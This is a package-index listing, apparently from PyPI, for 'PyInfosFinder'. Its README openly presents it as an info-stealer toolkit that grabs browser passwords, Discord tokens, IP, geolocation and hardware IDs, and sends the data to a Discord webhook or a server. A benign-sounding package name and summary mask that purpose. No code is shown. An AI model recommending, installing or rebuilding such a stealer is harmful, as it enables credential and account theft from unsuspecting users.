PyInfosFinder


NamePyInfosFinder JSON
Version 0.1.0 PyPI version JSON
download
home_pagehttps://github.com/EuroMH/PyInfosRetriver
SummaryA Python package that can get information.
upload_time2024-12-08 22:05:34
maintainerNone
docs_urlNone
authorEuroMH
requires_python>=3.12
licenseNone
keywords sample setuptools development
VCS
bugtrack_url
requirements No requirements were recorded.
Travis-CI No Travis.
coveralls test coverage No coveralls.
            # PyMalWare - Info Stealer Toolkit

**Note**: The use of this toolkit for malicious purposes, such as unauthorized access to systems, stealing information, or causing harm to others, is **illegal** and **unethical**. This repository is provided for educational purposes only, and the code should not be used for any harmful activity.

## Description

`PyMalWare` is a Python-based malware/info-stealer toolkit that collects a variety of system and user information, including:

- **IP address**
- **Geolocation**
- **Hardware details (CPU, GPU, RAM, etc.)**
- **System configuration**
- **Battery and uptime status**
  
The collected data can be sent to an external server or saved locally for further analysis.

This toolkit is a demonstration of how data can be extracted from a system, and it can be useful for security researchers and penetration testers who are interested in understanding how malicious software works.

## Features

- **IP Address**: Retrieves the public IP of the system.
- **Hardware ID (HWID)**: Fetches unique hardware identifiers.
- **Geolocation**: Uses the public IP to get location data (latitude, longitude, etc.).
- **System Information**: Gathers information on the system's CPU, GPU, RAM, OS, and more.
- **Battery and Uptime**: Provides battery status and system uptime.
- **And other usefull things like:**

- **Cookie Stealer**: put all the password with user and url in a txt file called "data.txt" in the temp folder, the function will return the path of the file, so you can delete it after uploading it to a discord webhook / a server
- **Discord Token Finder**: returns all the detected tokens on the user's machine
- 

## Installation

To use the toolkit, clone this repository and install the required dependencies:

```bash
git clone https://github.com/your-username/PyMalWare.git
cd PyMalWare
pip install -r requirements.txt
```

## Ethical Considerations

WARNING: This code is a demonstration of how malicious software works, and it should never be used for malicious purposes. Using this code to steal personal information, spy on users, or damage systems is illegal and unethical.

If you are interested in learning about cybersecurity or ethical hacking, always ensure that you have explicit permission from the system owner and follow legal guidelines.
Legal and Ethical Hacking Practices

If you're interested in improving your understanding of security and ethical hacking, here are some responsible activities you can engage in:

    Penetration testing (with explicit permission)
    Capture the flag (CTF) challenges
    Security research on public systems

Always use your skills in a responsible, ethical, and legal manner.

            

Raw data

            {
    "_id": null,
    "home_page": "https://github.com/EuroMH/PyInfosRetriver",
    "name": "PyInfosFinder",
    "maintainer": null,
    "docs_url": null,
    "requires_python": ">=3.12",
    "maintainer_email": "EuroMH <bypassfdp1501@gmail.com>",
    "keywords": "sample, setuptools, development",
    "author": "EuroMH",
    "author_email": "bypassfdp1501@gmail.com",
    "download_url": "https://files.pythonhosted.org/packages/b1/2b/2eab6e5f902b4b50b9f3c0535eded79d461c659b8b4508a3c9c30e63f73d/pyinfosfinder-0.1.0.tar.gz",
    "platform": null,
    "description": "# PyMalWare - Info Stealer Toolkit\r\n\r\n**Note**: The use of this toolkit for malicious purposes, such as unauthorized access to systems, stealing information, or causing harm to others, is **illegal** and **unethical**. This repository is provided for educational purposes only, and the code should not be used for any harmful activity.\r\n\r\n## Description\r\n\r\n`PyMalWare` is a Python-based malware/info-stealer toolkit that collects a variety of system and user information, including:\r\n\r\n- **IP address**\r\n- **Geolocation**\r\n- **Hardware details (CPU, GPU, RAM, etc.)**\r\n- **System configuration**\r\n- **Battery and uptime status**\r\n  \r\nThe collected data can be sent to an external server or saved locally for further analysis.\r\n\r\nThis toolkit is a demonstration of how data can be extracted from a system, and it can be useful for security researchers and penetration testers who are interested in understanding how malicious software works.\r\n\r\n## Features\r\n\r\n- **IP Address**: Retrieves the public IP of the system.\r\n- **Hardware ID (HWID)**: Fetches unique hardware identifiers.\r\n- **Geolocation**: Uses the public IP to get location data (latitude, longitude, etc.).\r\n- **System Information**: Gathers information on the system's CPU, GPU, RAM, OS, and more.\r\n- **Battery and Uptime**: Provides battery status and system uptime.\r\n- **And other usefull things like:**\r\n\r\n- **Cookie Stealer**: put all the password with user and url in a txt file called \"data.txt\" in the temp folder, the function will return the path of the file, so you can delete it after uploading it to a discord webhook / a server\r\n- **Discord Token Finder**: returns all the detected tokens on the user's machine\r\n- \r\n\r\n## Installation\r\n\r\nTo use the toolkit, clone this repository and install the required dependencies:\r\n\r\n```bash\r\ngit clone https://github.com/your-username/PyMalWare.git\r\ncd PyMalWare\r\npip install -r requirements.txt\r\n```\r\n\r\n## Ethical Considerations\r\n\r\nWARNING: This code is a demonstration of how malicious software works, and it should never be used for malicious purposes. Using this code to steal personal information, spy on users, or damage systems is illegal and unethical.\r\n\r\nIf you are interested in learning about cybersecurity or ethical hacking, always ensure that you have explicit permission from the system owner and follow legal guidelines.\r\nLegal and Ethical Hacking Practices\r\n\r\nIf you're interested in improving your understanding of security and ethical hacking, here are some responsible activities you can engage in:\r\n\r\n    Penetration testing (with explicit permission)\r\n    Capture the flag (CTF) challenges\r\n    Security research on public systems\r\n\r\nAlways use your skills in a responsible, ethical, and legal manner.\r\n",
    "bugtrack_url": null,
    "license": null,
    "summary": "A Python package that can get information.",
    "version": "0.1.0",
    "project_urls": {
        "Bug Reports": "https://github.com/EuroMH/PyInfosRetriver/issues",
        "Download": "https://github.com/EuroMH/PyInfosRetriver/releases/tag/1",
        "Funding": "https://donate.pypi.org",
        "Homepage": "https://github.com/EuroMH/PyInfosRetriver",
        "Say Thanks!": "http://saythanks.io/to/example",
        "Source": "https://github.com/EuroMH/PyInfosRetriver"
    },
    "split_keywords": [
        "sample",
        " setuptools",
        " development"
    ],
    "urls": [
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "17cac4473461d1d004ab0cacc3f288cda8807e8834d18404b7be4a14d8efff6b",
                "md5": "15789dd7f894ddac2406d62e146a3f94",
                "sha256": "827211174e5b5265deba392173a2ffdee2c31be1f752e4e1f6d2fe3dc6285d1c"
            },
            "downloads": -1,
            "filename": "PyInfosFinder-0.1.0-py3-none-any.whl",
            "has_sig": false,
            "md5_digest": "15789dd7f894ddac2406d62e146a3f94",
            "packagetype": "bdist_wheel",
            "python_version": "py3",
            "requires_python": ">=3.12",
            "size": 11511,
            "upload_time": "2024-12-08T22:05:32",
            "upload_time_iso_8601": "2024-12-08T22:05:32.958474Z",
            "url": "https://files.pythonhosted.org/packages/17/ca/c4473461d1d004ab0cacc3f288cda8807e8834d18404b7be4a14d8efff6b/PyInfosFinder-0.1.0-py3-none-any.whl",
            "yanked": false,
            "yanked_reason": null
        },
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "b12b2eab6e5f902b4b50b9f3c0535eded79d461c659b8b4508a3c9c30e63f73d",
                "md5": "89dbc8fdd610f4e8d37a6e25cffc1b6b",
                "sha256": "f9bebfc2ed5555ae695a0b04faa3040eca0b9c0a2268d99300a6f6d9afba7612"
            },
            "downloads": -1,
            "filename": "pyinfosfinder-0.1.0.tar.gz",
            "has_sig": false,
            "md5_digest": "89dbc8fdd610f4e8d37a6e25cffc1b6b",
            "packagetype": "sdist",
            "python_version": "source",
            "requires_python": ">=3.12",
            "size": 12542,
            "upload_time": "2024-12-08T22:05:34",
            "upload_time_iso_8601": "2024-12-08T22:05:34.830986Z",
            "url": "https://files.pythonhosted.org/packages/b1/2b/2eab6e5f902b4b50b9f3c0535eded79d461c659b8b4508a3c9c30e63f73d/pyinfosfinder-0.1.0.tar.gz",
            "yanked": false,
            "yanked_reason": null
        }
    ],
    "upload_time": "2024-12-08 22:05:34",
    "github": true,
    "gitlab": false,
    "bitbucket": false,
    "codeberg": false,
    "github_user": "EuroMH",
    "github_project": "PyInfosRetriver",
    "travis_ci": false,
    "coveralls": false,
    "github_actions": true,
    "lcname": "pyinfosfinder"
}
        
Elapsed time: 0.39641s